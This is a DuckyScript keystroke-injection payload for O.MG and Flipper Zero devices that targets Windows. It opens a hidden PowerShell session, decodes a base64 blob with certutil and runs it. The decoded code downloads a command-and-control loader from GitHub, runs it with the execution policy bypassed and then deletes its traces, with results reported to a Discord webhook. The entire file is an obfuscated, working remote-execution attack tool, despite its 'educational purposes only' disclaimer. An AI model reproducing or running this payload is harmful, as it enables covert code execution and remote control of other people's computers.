omg-payloads/payloads/library/execution/C2-Payload-Loader/Bootstrap-pLoader.txt

36 lines
5.5 KiB
Plaintext

REM Title: BOOTSTRAP - C2 Payload Loader (pLoader) w Discord Reporting
REM Description: Bootstrap Payload for Remote (C2) Payload Loader with Discord Reporting.
REM This allows the payload to be executed on OMG Basic and other Smaller Devices. All
REM inputs below are needed to start the script, unless know how to edit the Source. OMG
REM and InfoSecREDD (REDD) are not responsible for the misuse of this Payload. This is
REM for Educational Purposes only.
REM IT IS ADVISED TO EDIT THE MAIN URL TO POINT TO A CUSTOM VERSION W YOUR VARIABLES
REM AUTHOR: InfoSecREDD
REM Version: 0.2
REM Category: Execution (REMOTE)
REM Compatibility: Flipper Zero AND DuckyScript Devices
REM Target: Windows
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM Put your Discord webhook below.
STRING $webhook = "DiscordWebhookHere";
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
STRING $ccontrol = "C2FileHere";
REM Put your Remote List of Payloads below.
STRING $URLS = "URLFileListHere";
REM Put your Timer file below. 10-18000 Its counted in Minutes.
STRING $timer = "TimerFileHere";
REM OVERDRIVE - Overdrive allows the payloads to execute without prior payload finishing. 1 = ON and 0 = OFF
STRING $overdrive = "OverdriveFileHere";
REM Lets run this thing.
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo JFVSTCA9ICJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vaGFrNS9vbWctcGF5bG9hZHMvbWFzdGVyL3BheWxvYWRzL2xpYnJhcnkvZXhlY3V0aW9uL0MyLVBheWxvYWQtTG9hZGVyL0MyLXBMb2FkZXIudHh0Ig0KJGkgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coaW50IGhhbmRsZSwgaW50IHN0YXRlKTsnOw0KYWRkLXR5cGUgLW5hbWUgd2luIC1tZW1iZXIgJGkgLW5hbWVzcGFjZSBuYXRpdmU7DQpbbmF0aXZlLndpbl06OlNob3dXaW5kb3coKFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OkdldEN1cnJlbnRQcm9jZXNzKCkgfCBHZXQtUHJvY2VzcykuTWFpbldpbmRvd0hhbmRsZSwgMCk7DQokUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiRSQU5mID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMSB8ICUge1tjaGFyXSRffSkNCiRkaXJfbmFtZSA9ICIkUkFOIg0KJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiR0ZW1wRmlsZW5hbWUgPSAidC50eHQiDQokdGVtcEZpbGUgPSAiJHBhdGhcJHRlbXBGaWxlbmFtZSINCmlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCnsNCiAgTmV3LUl0ZW0gIiRwYXRoIiAtSXRlbVR5cGUgRGlyZWN0b3J5ICA+JG51bGwgMj4mMQ0KfQ0KaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCnsNCiAgTmV3LUl0ZW0gLVBhdGggIiRwYXRoIiAtTmFtZSAiJHRlbXBGaWxlbmFtZSIgLUl0ZW1UeXBlIEZpbGUgID4kbnVsbCAyPiYxDQp9DQokZW5jRG93biA9ICgoSW52b2tlLXdlYnJlcXVlc3QgLVVSSSAiJFVSTCIgLVVzZUJhc2ljUGFyc2luZykuQ29udGVudCB8IE91dC1TdHJpbmcpLlRyaW0oKSB8IEZvckVhY2gtT2JqZWN0IHsgW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRfKSkgfQ0KJGV4ZURvd24gPSAiJGVuY0Rvd24iIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KIiRleGVEb3duIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiJHRlbXBGaWxlIiAtQXBwZW5kDQokYmFzZTY0U3RyID0gJ2VjaG8gW0EtWmEtejAtOS8rXC1fXXsxMjUsfScNCiRkb3duQ29udCA9IEdldC1Db250ZW50IC1QYXRoICIke3RlbXBGaWxlfSIgLVJhdw0KJG1hdGNoID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyIikNCmlmICgkbWF0Y2guU3VjY2Vzcykgew0KICAkUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiAgJFJBTmYgPSAtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxIHwgJSB7W2NoYXJdJF99KQ0KICAkZGlyX25hbWUgPSAiJFJBTiINCiAgJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiAgJHRlbXBGaWxlbmFtZSA9ICJ0LnBzMSINCiAgJHRlbXBGaWxlID0gIiRwYXRoXCR0ZW1wRmlsZW5hbWUiDQogICRiYXNlNjRTdHJDb250ZW50ID0gJ1tBLVphLXowLTkrLz1dezEyNSx9Jw0KICAkbWF0Y2hDb250ZW50ID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyQ29udGVudCIpDQogIGlmICgkbWF0Y2hDb250ZW50LlN1Y2Nlc3MpIHsNCiAgICAkZXh0cmFjdGVkU3RyaW5nID0gJG1hdGNoQ29udGVudC5WYWx1ZQ0KICAgIGlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAiJHBhdGgiIC1JdGVtVHlwZSBEaXJlY3RvcnkgID4kbnVsbCAyPiYxDQogICAgfQ0KICAgIGlmIChUZXN0LVBhdGggIiR0ZW1wRmlsZSIpDQogICAgew0KICAgICAgUmVtb3ZlLUl0ZW0gLVBhdGggIiR0ZW1wRmlsZSIgLUZvcmNlIC1SZWN1cnNlDQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgJGZvcm1hdHBMb2FkZXIgPSAtam9pbiAkZXh0cmFjdGVkU3RyaW5nDQogICAgJHBMb2FkZXJSYXcgPSAiJGZvcm1hdHBMb2FkZXIiIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KICAgICRmaXhwTG9hZGVyID0gJHBMb2FkZXJSYXcuU3Vic3RyaW5nKDEpDQogICAgImAkd2ViaG9vayA9IGAiJHdlYmhvb2tgImA7IGAkY2NvbnRyb2wgPSBgIiRjY29udHJvbGAiYDsgYCRVUkxTID0gYCIkVVJMU2AiYDsgYCR0aW1lciA9IGAiJHRpbWVyYCI7IGAkb3ZlcmRyaXZlID0gYCIkb3ZlcmRyaXZlYCJgOyIgfCBPdXQtRmlsZSAtRmlsZVBhdGggIiRwYXRoXCR0ZW1wRmlsZW5hbWUiIC1BcHBlbmQNCiAgICAiJGZpeHBMb2FkZXIiIHwgT3V0LUZpbGUgLUZpbGVQYXRoICIkcGF0aFwkdGVtcEZpbGVuYW1lIiAtQXBwZW5kDQogIH0NCg0KU3RhcnQtUHJvY2VzcyBwb3dlcnNoZWxsIC1Bcmd1bWVudExpc3QgIi1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgYCImICckdGVtcEZpbGUnYCIiIC1QYXNzVGhydSAtV2luZG93U3R5bGUgTWluaW1pemVkID4kbnVsbCAyPiYxDQpzbGVlcCA1DQp9DQppZiAoVGVzdC1QYXRoICIkcGF0aCIpIHsNClJlbW92ZS1JdGVtIC1QYXRoICIkdGVtcEZpbGUiIC1Gb3JjZSAtUmVjdXJzZQ0KUmVtb3ZlLUl0ZW0gLVBhdGggIiRwYXRoIiAtRm9yY2UgLVJlY3Vyc2UNCn0NCmV4aXQgMA== > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
DELAY 1000
ENTER